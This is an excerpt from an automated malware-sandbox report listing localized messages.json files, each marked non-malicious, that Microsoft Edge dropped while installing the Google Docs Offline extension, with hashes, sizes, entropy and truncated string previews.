                                                                                                                                                                                                                                                                                                                          SHA-256:A6118F0A0DE329E07C01F53CD6FB4FED43E54C5F53DB4CD1C7F5B2B4D9FB10E6
                                                                                                                                                                                                                                                                                                                          SHA-512:1E8D15B8BFF1D289434A244172F9ED42B4BB6BCB6372C1F300B01ACEA5A88167E97FEDABA0A7AE3BEB5E24763D1B09046AE8E30745B80E2E2FE785C94DF362F6
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:{"createnew":{"message":"\u1794\u1784\u17d2\u1780\u17be\u178f\u200b\u1790\u17d2\u1798\u17b8"},"explanationofflinedisabled":{"message":"\u17a2\u17d2\u1793\u1780\u200b\u1782\u17d2\u1798\u17b6\u1793\u200b\u17a2\u17ca\u17b8\u1793\u1792\u17ba\u178e\u17b7\u178f\u17d4 \u178a\u17be\u1798\u17d2\u1794\u17b8\u200b\u1794\u17d2\u179a\u17be Google \u17af\u1780\u179f\u17b6\u179a\u200b\u1794\u17b6\u1793\u200b\u200b\u178a\u17c4\u1799\u200b\u200b\u1798\u17b7\u1793\u1798\u17b6\u1793\u200b\u200b\u200b\u17a2\u17ca\u17b8\u1793\u1792\u17ba\u178e\u17b7\u178f \u179f\u17bc\u1798\u200b\u200b\u1791\u17c5\u200b\u1780\u17b6\u1793\u17cb\u200b\u1780\u17b6\u179a\u200b\u1780\u17c6\u178e\u178f\u17cb\u200b\u1793\u17c5\u200b\u179b\u17be\u200b\u1782\u17c1\u17a0\u1791\u17c6\u1796\u17d0\u179a Google \u17af\u1780\u179f\u17b6\u179a \u1793\u17b7\u1784\u200b\u1794\u17be\u1780\u200b\u1780\u17b6\u179a\u1792\u17d2\u179c\u17be\u200b\u179f\u1798\u1780\u17b6\u179b\u1780\u1798\u17d2\u1798\u200b\u200b\u200b\u1782\u17d2\u1798\u17b6\u1793

                                                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir7924_581038178\CRX_INSTALL\_locales\kn\messages.json

                                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):1895
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):4.28990403715536
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:48:SHYGuEETiuF6OX5tCYFZt5GurMRRevsY4tVZIGnZRxlKT6/U0WG:yYG8iuF6yTCYFH5GjLPtVZVZRxOZ0J
                                                                                                                                                                                                                                                                                                                          MD5:38BE0974108FC1CC30F13D8230EE5C40
                                                                                                                                                                                                                                                                                                                          SHA1:ACF44889DD07DB97D26D534AD5AFA1BC1A827BAD
                                                                                                                                                                                                                                                                                                                          SHA-256:30078EF35A76E02A400F03B3698708A0145D9B57241CC4009E010696895CF3A1
                                                                                                                                                                                                                                                                                                                          SHA-512:7BDB2BADE4680801FC3B33E82C8AA4FAC648F45C795B4BACE4669D6E907A578FF181C093464884C0E00C9762E8DB75586A253D55CD10A7777D281B4BFFAFE302
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": "........ .....".. },.. "explanationofflinedisabled": {.. "message": ".... ..................... ......... ............. Google ...... ....., Google ...... ............ ............... .... ..... ...... .... .... ............ ............. ........ ..... ... .....".. },.. "explanationofflineenabled": {.. "message": ".... ...................., .... .... .... ......... ........... ............ .... ........ .........."..

                                                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir7924_581038178\CRX_INSTALL\_locales\ko\messages.json

                                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):1042
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.3945675025513955
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:24:1HAWYsF4dqNfBQH49Hk8YfIhYzTJ+6WJBtl/u4s+6:ZF4wNfvm87mX4LF6
                                                                                                                                                                                                                                                                                                                          MD5:F3E59EEEB007144EA26306C20E04C292
                                                                                                                                                                                                                                                                                                                          SHA1:83E7BDFA1F18F4C7534208493C3FF6B1F2F57D90
                                                                                                                                                                                                                                                                                                                          SHA-256:C52D9B955D229373725A6E713334BBB31EA72EFA9B5CF4FBD76A566417B12CAC
                                                                                                                                                                                                                                                                                                                          SHA-512:7808CB5FF041B002CBD78171EC5A0B4DBA3E017E21F7E8039084C2790F395B839BEE04AD6C942EED47CCB53E90F6DE818A725D1450BF81BA2990154AFD3763AF
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": ".. ...".. },.. "explanationofflinedisabled": {.. "message": ".... ...... ... .. .. Google Docs. ..... Google Docs .... .... .... .... .... ..... . .... .... ..... ......".. },.. "explanationofflineenabled": {.. "message": ".... ...... ... .. ... ... ..... ... ... .. . .....".. },.. "extdesc": {.. "message": ".... .... ... .., ...... . ....... .., .., ......".. },.. "extname": {.. "message": "Google Docs ....".. },.. "learnmore": {.. "message": "... ....".. },.. "popuphelptext": {.. "message": "... .. ... .... ..... .... .... .....

                                                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir7924_581038178\CRX_INSTALL\_locales\lo\messages.json

                                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):2535
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):3.8479764584971368
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:48:YRcHe/4raK1EIlZt1wg62FIOg+xGaF8guI5EP9I2yC:+cs4raK1xlZtOgviOfGaF8RI5EP95b
                                                                                                                                                                                                                                                                                                                          MD5:E20D6C27840B406555E2F5091B118FC5
                                                                                                                                                                                                                                                                                                                          SHA1:0DCECC1A58CEB4936E255A64A2830956BFA6EC14
                                                                                                                                                                                                                                                                                                                          SHA-256:89082FB05229826BC222F5D22C158235F025F0E6DF67FF135A18BD899E13BB8F
                                                                                                                                                                                                                                                                                                                          SHA-512:AD53FC0B153005F47F9F4344DF6C4804049FAC94932D895FD02EEBE75222CFE77EEDD9CD3FDC4C88376D18C5972055B00190507AA896488499D64E884F84F093
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:{"createnew":{"message":"\u0eaa\u0ec9\u0eb2\u0e87\u0ec3\u0edd\u0ec8"},"explanationofflinedisabled":{"message":"\u0e97\u0ec8\u0eb2\u0e99\u0ead\u0ead\u0e9a\u0ea5\u0eb2\u0e8d\u0ea2\u0eb9\u0ec8. \u0ec0\u0e9e\u0eb7\u0ec8\u0ead\u0ec3\u0e8a\u0ec9 Google Docs \u0ec2\u0e94\u0e8d\u0e9a\u0ecd\u0ec8\u0ec0\u0e8a\u0eb7\u0ec8\u0ead\u0ea1\u0e95\u0ecd\u0ec8\u0ead\u0eb4\u0e99\u0ec0\u0e95\u0eb5\u0ec0\u0e99\u0eb1\u0e94, \u0ec3\u0eab\u0ec9\u0ec4\u0e9b\u0e97\u0eb5\u0ec8\u0e81\u0eb2\u0e99\u0e95\u0eb1\u0ec9\u0e87\u0e84\u0ec8\u0eb2\u0ec3\u0e99\u0edc\u0ec9\u0eb2 Google Docs \u0ec1\u0ea5\u0ec9\u0ea7\u0ec0\u0e9b\u0eb5\u0e94\u0ec3\u0e8a\u0ec9\u0e81\u0eb2\u0e99\u0e8a\u0eb4\u0ec9\u0e87\u0ec1\u0e9a\u0e9a\u0ead\u0ead\u0e9a\u0ea5\u0eb2\u0e8d\u0ec3\u0e99\u0ec0\u0e97\u0eb7\u0ec8\u0ead\u0e95\u0ecd\u0ec8\u0ec4\u0e9b\u0e97\u0eb5\u0ec8\u0e97\u0ec8\u0eb2\u0e99\u0ec0\u0e8a\u0eb7\u0ec8\u0ead\u0ea1\u0e95\u0ecd\u0ec8\u0ead\u0eb4\u0e99\u0ec0\u0e95\u0eb5\u0ec0\u0e99\u0eb1\u0e94."},"explanationofflineenabled":{"message":"\u0e97\u0ec

                                                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir7924_581038178\CRX_INSTALL\_locales\lt\messages.json

                                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):1028
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):4.797571191712988
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:24:1HAivZZaJ3Rje394+k7IKgpAJjUpSkiQjuRBMd:fZZahBeu7IKgqeMg
                                                                                                                                                                                                                                                                                                                          MD5:970544AB4622701FFDF66DC556847652
                                                                                                                                                                                                                                                                                                                          SHA1:14BEE2B77EE74C5E38EBD1DB09E8D8104CF75317
                                                                                                                                                                                                                                                                                                                          SHA-256:5DFCBD4DFEAEC3ABE973A78277D3BD02CD77AE635D5C8CD1F816446C61808F59
                                                                                                                                                                                                                                                                                                                          SHA-512:CC12D00C10B970189E90D47390EEB142359A8D6F3A9174C2EF3AE0118F09C88AB9B689D9773028834839A7DFAF3AAC6747BC1DCB23794A9F067281E20B8DC6EA
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": "SUKURTI NAUJ.".. },.. "explanationofflinedisabled": {.. "message": "Esate neprisijung.. Jei norite naudoti .Google. dokumentus be interneto ry.io, pagrindiniame .Google. dokument. puslapyje eikite . nustatym. skilt. ir .junkite sinchronizavim. neprisijungus, kai kit. kart. b.site prisijung. prie interneto.".. },.. "explanationofflineenabled": {.. "message": "Esate neprisijung., bet vis tiek galite redaguoti pasiekiamus failus arba sukurti nauj..".. },.. "extdesc": {.. "message": "Redaguokite, kurkite ir per.i.r.kite savo dokumentus, skai.iuokles ir pristatymus . visk. darykite be prieigos prie interneto.".. },.. "extname": {.. "message": ".Google. dokumentai neprisijungus".. },.. "learnmore": {.. "message": "Su.inoti daugiau".. },.. "popuphelptext": {.. "message": "Ra.ykite, redaguokite ir bendradarbiaukite bet kurioje vietoje naudodami interneto ry.. arba

                                                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir7924_581038178\CRX_INSTALL\_locales\lv\messages.json

                                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):994
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):4.700308832360794
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:24:1HAaJ7a/uNpoB/Y4vPnswSPkDzLKFQHpp//BpPDB:7J7a/uzQ/Y4vvswhDzDr/LDB
                                                                                                                                                                                                                                                                                                                          MD5:A568A58817375590007D1B8ABCAEBF82
                                                                                                                                                                                                                                                                                                                          SHA1:B0F51FE6927BB4975FC6EDA7D8A631BF0C1AB597
                                                                                                                                                                                                                                                                                                                          SHA-256:0621DE9161748F45D53052ED8A430962139D7F19074C7FFE7223ECB06B0B87DB
                                                                                                                                                                                                                                                                                                                          SHA-512:FCFBADEC9F73975301AB404DB6B09D31457FAC7CCAD2FA5BE348E1CAD6800F87CB5B56DE50880C55BBADB3C40423351A6B5C2D03F6A327D898E35F517B1C628C
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": "IZVEIDOT JAUNU".. },.. "explanationofflinedisabled": {.. "message": "J.s esat bezsaist.. Lai lietotu pakalpojumu Google dokumenti bez interneta savienojuma, n.kamaj. reiz., kad ir izveidots savienojums ar internetu, atveriet Google dokumentu s.kumlapas iestat.jumu izv.lni un iesl.dziet sinhroniz.ciju bezsaist..".. },.. "explanationofflineenabled": {.. "message": "J.s esat bezsaist., ta.u varat redi..t pieejamos failus un izveidot jaunus.".. },.. "extdesc": {.. "message": "Redi..jiet, veidojiet un skatiet savus dokumentus, izkl.jlapas un prezent.cijas, neizmantojot savienojumu ar internetu.".. },.. "extname": {.. "message": "Google dokumenti bezsaist.".. },.. "learnmore": {.. "message": "Uzziniet vair.k".. },.. "popuphelptext": {.. "message": "Rakstiet, redi..jiet un sadarbojieties ar interneta savienojumu vai bez t. neatkar.gi no t., kur atrodaties.".. }..}..

                                                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir7924_581038178\CRX_INSTALL\_locales\ml\messages.json

                                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):2091
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):4.358252286391144
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:24:1HAnHdGc4LtGxVY6IuVzJkeNL5kP13a67wNcYP8j5PIaSTIjPU4ELFPCWJjMupV/:idGcyYPVtkAUl7wqziBsg9DbpN6XoN/
                                                                                                                                                                                                                                                                                                                          MD5:4717EFE4651F94EFF6ACB6653E868D1A
                                                                                                                                                                                                                                                                                                                          SHA1:B8A7703152767FBE1819808876D09D9CC1C44450
                                                                                                                                                                                                                                                                                                                          SHA-256:22CA9415E294D9C3EC3384B9D08CDAF5164AF73B4E4C251559E09E529C843EA6
                                                                                                                                                                                                                                                                                                                          SHA-512:487EAB4938F6BC47B1D77DD47A5E2A389B94E01D29849E38E96C95CABC7BD98679451F0E22D3FEA25C045558CD69FDDB6C4FEF7C581141F1C53C4AA17578D7F7
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": "....... ............".. },.. "explanationofflinedisabled": {.. "message": "...... ........... ........... ............. ..... Google ....... ..........., Google ....... .......... ............. .... ...... ...... ... ............... .................... '.......... ................' .........".. },.. "explanationofflineenabled": {.. "message": "................., .......... ......... ....... ...... ..............

                                                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir7924_581038178\CRX_INSTALL\_locales\mn\messages.json

                                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):2778
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):3.595196082412897
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:48:Y943BFU1LQ4HwQLQ4LQhlmVQL3QUm6H6ZgFIcwn6Rs2ShpQ3IwjGLQSJ/PYoEQj8:I43BCymz8XNcfuQDXYN2sum
                                                                                                                                                                                                                                                                                                                          MD5:83E7A14B7FC60D4C66BF313C8A2BEF0B
                                                                                                                                                                                                                                                                                                                          SHA1:1CCF1D79CDED5D65439266DB58480089CC110B18
                                                                                                                                                                                                                                                                                                                          SHA-256:613D8751F6CC9D3FA319F4B7EA8B2BD3BED37FD077482CA825929DD7C12A69A8
                                                                                                                                                                                                                                                                                                                          SHA-512:3742E24FFC4B5283E6EE496813C1BDC6835630D006E8647D427C3DE8B8E7BF814201ADF9A27BFAB3ABD130B6FEC64EBB102AC0EB8DEDFE7B63D82D3E1233305D
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:{"createnew":{"message":"\u0428\u0418\u041d\u0418\u0419\u0413 \u04ae\u04ae\u0421\u0413\u042d\u0425"},"explanationofflinedisabled":{"message":"\u0422\u0430 \u043e\u0444\u043b\u0430\u0439\u043d \u0431\u0430\u0439\u043d\u0430. Google \u0414\u043e\u043a\u044b\u0433 \u0438\u043d\u0442\u0435\u0440\u043d\u044d\u0442\u0433\u04af\u0439\u0433\u044d\u044d\u0440 \u0430\u0448\u0438\u0433\u043b\u0430\u0445\u044b\u043d \u0442\u0443\u043b\u0434 \u0434\u0430\u0440\u0430\u0430\u0433\u0438\u0439\u043d \u0443\u0434\u0430\u0430 \u0438\u043d\u0442\u0435\u0440\u043d\u044d\u0442\u044d\u0434 \u0445\u043e\u043b\u0431\u043e\u0433\u0434\u043e\u0445\u0434\u043e\u043e Google \u0414\u043e\u043a\u044b\u043d \u043d\u04af\u04af\u0440 \u0445\u0443\u0443\u0434\u0430\u0441\u043d\u0430\u0430\u0441 \u0442\u043e\u0445\u0438\u0440\u0433\u043e\u043e \u0434\u043e\u0442\u043e\u0440\u0445 \u043e\u0444\u043b\u0430\u0439\u043d \u0441\u0438\u043d\u043a\u0438\u0439\u0433 \u0438\u0434\u044d\u0432\u0445\u0436\u04af\u04af\u043b\u043d\u0

                                                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir7924_581038178\CRX_INSTALL\_locales\mr\messages.json

                                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):1719
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):4.287702203591075
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:48:65/5EKaDMw6pEf4I5+jSksOTJqQyrFO8C:65/5EKaAw6pEf4I5+vsOVqQyFO8C
                                                                                                                                                                                                                                                                                                                          MD5:3B98C4ED8874A160C3789FEAD5553CFA
                                                                                                                                                                                                                                                                                                                          SHA1:5550D0EC548335293D962AAA96B6443DD8ABB9F6
                                                                                                                                                                                                                                                                                                                          SHA-256:ADEB082A9C754DFD5A9D47340A3DDCC19BF9C7EFA6E629A2F1796305F1C9A66F
                                                                                                                                                                                                                                                                                                                          SHA-512:5139B6C6DF9459C7B5CDC08A98348891499408CD75B46519BA3AC29E99AAAFCC5911A1DEE6C3A57E3413DBD0FAE72D7CBC676027248DCE6364377982B5CE4151
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": ".... .... ...".. },.. "explanationofflinedisabled": {.. "message": "...... ...... ..... ......... ....... ....... ..... Google ....... ............, Google ....... .............. .......... .. ... ..... .... ...... ......... ...... ...... ...... .... .... ....".. },.. "explanationofflineenabled": {.. "message": "...... ...... ...., ..... ...... ...... ...... .... ....... ... ..... .... .... ... .....".. },.. "extdesc": {.. "message": "..... ..

                                                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir7924_581038178\CRX_INSTALL\_locales\ms\messages.json

                                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):936
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):4.457879437756106
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:24:1HARXIqhmemNKsE27rhdfNLChtyo2JJ/YgTgin:iIqFC7lrDfNLCIBRzn
                                                                                                                                                                                                                                                                                                                          MD5:7D273824B1E22426C033FF5D8D7162B7
                                                                                                                                                                                                                                                                                                                          SHA1:EADBE9DBE5519BD60458B3551BDFC36A10049DD1
                                                                                                                                                                                                                                                                                                                          SHA-256:2824CF97513DC3ECC261F378BFD595AE95A5997E9D1C63F5731A58B1F8CD54F9
                                                                                                                                                                                                                                                                                                                          SHA-512:E5B611BBFAB24C9924D1D5E1774925433C65C322769E1F3B116254B1E9C69B6DF1BE7828141EEBBF7524DD179875D40C1D8F29C4FB86D663B8A365C6C60421A7
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": "BUAT BAHARU".. },.. "explanationofflinedisabled": {.. "message": "Anda berada di luar talian. Untuk menggunakan Google Docs tanpa sambungan Internet, pergi ke tetapan di halaman utama Google Docs dan hidupkan penyegerakan luar talian apabila anda disambungkan ke Internet selepas ini.".. },.. "explanationofflineenabled": {.. "message": "Anda berada di luar talian, tetapi anda masih boleh mengedit fail yang tersedia atau buat fail baharu.".. },.. "extdesc": {.. "message": "Edit, buat dan lihat dokumen, hamparan dan pembentangan anda . kesemuanya tanpa akses Internet.".. },.. "extname": {.. "message": "Google Docs Luar Talian".. },.. "learnmore": {.. "message": "Ketahui Lebih Lanjut".. },.. "popuphelptext": {.. "message": "Tulis, edit dan bekerjasama di mana-mana sahaja anda berada, dengan atau tanpa sambungan Internet.".. }..}..

                                                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir7924_581038178\CRX_INSTALL\_locales\my\messages.json

                                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):3830
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):3.5483353063347587
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:48:Ya+Ivxy6ur1+j3P7Xgr5ELkpeCgygyOxONHO3pj6H57ODyOXOVp6:8Uspsj3P3ty2a66xl09
                                                                                                                                                                                                                                                                                                                          MD5:342335A22F1886B8BC92008597326B24
                                                                                                                                                                                                                                                                                                                          SHA1:2CB04F892E430DCD7705C02BF0A8619354515513
                                                                                                                                                                                                                                                                                                                          SHA-256:243BEFBD6B67A21433DCC97DC1A728896D3A070DC20055EB04D644E1BB955FE7
                                                                                                                                                                                                                                                                                                                          SHA-512:CD344D060E30242E5A4705547E807CE3CE2231EE983BB9A8AD22B3E7598A7EC87399094B04A80245AD51D039370F09D74FE54C0B0738583884A73F0C7E888AD8
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:{"createnew":{"message":"\u1021\u101e\u1005\u103a \u1015\u103c\u102f\u101c\u102f\u1015\u103a\u101b\u1014\u103a"},"explanationofflinedisabled":{"message":"\u101e\u1004\u103a \u1021\u1031\u102c\u1037\u1016\u103a\u101c\u102d\u102f\u1004\u103a\u1038\u1016\u103c\u1005\u103a\u1014\u1031\u1015\u102b\u101e\u100a\u103a\u104b \u1021\u1004\u103a\u1010\u102c\u1014\u1000\u103a\u1001\u103b\u102d\u1010\u103a\u1006\u1000\u103a\u1019\u103e\u102f \u1019\u101b\u103e\u102d\u1018\u1032 Google Docs \u1000\u102d\u102f \u1021\u101e\u102f\u1036\u1038\u1015\u103c\u102f\u101b\u1014\u103a \u1014\u1031\u102c\u1000\u103a\u1010\u1005\u103a\u1000\u103c\u102d\u1019\u103a \u101e\u1004\u103a\u1021\u1004\u103a\u1010\u102c\u1014\u1000\u103a\u1001\u103b\u102d\u1010\u103a\u1006\u1000\u103a\u101e\u100a\u1037\u103a\u1021\u1001\u102b Google Docs \u1015\u1004\u103a\u1019\u1005\u102c\u1019\u103b\u1000\u103a\u1014\u103e\u102c\u101b\u103e\u102d \u1006\u1000\u103a\u1010\u1004\u103a\u1019\u103b\u102c\u1038\u101e\u102d\u102f\u1037\u1

                                                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir7924_581038178\CRX_INSTALL\_locales\ne\messages.json

                                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):1898
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):4.187050294267571
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:24:1HAmQ6ZSWfAx6fLMr48tE/cAbJtUZJScSIQoAfboFMiQ9pdvz48YgqG:TQ6W6MbkcAltUJxQdfbqQ9pp0gqG
                                                                                                                                                                                                                                                                                                                          MD5:B1083DA5EC718D1F2F093BD3D1FB4F37
                                                                                                                                                                                                                                                                                                                          SHA1:74B6F050D918448396642765DEF1AD5390AB5282
                                                                                                                                                                                                                                                                                                                          SHA-256:E6ED0A023EF31705CCCBAF1E07F2B4B2279059296B5CA973D2070417BA16F790
                                                                                                                                                                                                                                                                                                                          SHA-512:7102B90ABBE2C811E8EE2F1886A73B1298D4F3D5D05F0FFDB57CF78B9A49A25023A290B255BAA4895BB150B388BAFD9F8432650B8C70A1A9A75083FFFCD74F1A
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": ".... ....... .........".. },.. "explanationofflinedisabled": {.. "message": "..... ...... .......... .... ........ .... .... Google ........ ...... .... ..... ..... ... .......... ....... .... Google ........ .......... ..... .......... .. ...... ..... .... ..... ......... .. ..........".. },.. "explanationofflineenabled": {.. "message": "..... ...... ........., .. ..... ... ... ...... ....... ....... .. .... ....... ....

                                                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir7924_581038178\CRX_INSTALL\_locales\nl\messages.json

                                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):914
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):4.513485418448461
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:12:1HASvgFARCBxNBv52/fXjOXl6W6ICBxeBvMzU1CSUJAO6SFAIVIbCBhZHdb1tvz+:1HABJx4X6QDwEzlm2uGvYzKU
                                                                                                                                                                                                                                                                                                                          MD5:32DF72F14BE59A9BC9777113A8B21DE6
                                                                                                                                                                                                                                                                                                                          SHA1:2A8D9B9A998453144307DD0B700A76E783062AD0
                                                                                                                                                                                                                                                                                                                          SHA-256:F3FE1FFCB182183B76E1B46C4463168C746A38E461FD25CA91FF2A40846F1D61
                                                                                                                                                                                                                                                                                                                          SHA-512:E0966F5CCA5A8A6D91C58D716E662E892D1C3441DAA5D632E5E843839BB989F620D8AC33ED3EDBAFE18D7306B40CD0C4639E5A4E04DA2C598331DACEC2112AAD
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": "NIEUW MAKEN".. },.. "explanationofflinedisabled": {.. "message": "Je bent offline. Wil je Google Documenten zonder internetverbinding gebruiken, ga dan de volgende keer dat je verbinding met internet hebt naar 'Instellingen' op de homepage van Google Documenten en zet 'Offline synchronisatie' aan.".. },.. "explanationofflineenabled": {.. "message": "Je bent offline, maar je kunt nog wel beschikbare bestanden bewerken of nieuwe bestanden maken.".. },.. "extdesc": {.. "message": "Bewerk, maak en bekijk je documenten, spreadsheets en presentaties. Allemaal zonder internettoegang.".. },.. "extname": {.. "message": "Offline Documenten".. },.. "learnmore": {.. "message": "Meer informatie".. },.. "popuphelptext": {.. "message": "Overal schrijven, bewerken en samenwerken, met of zonder internetverbinding.".. }..}..

                                                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir7924_581038178\CRX_INSTALL\_locales\nn\messages.json

                                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):851
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):4.4858053753176526
                                                                                                                                                                                                                                                                                                                          Encrypted:false
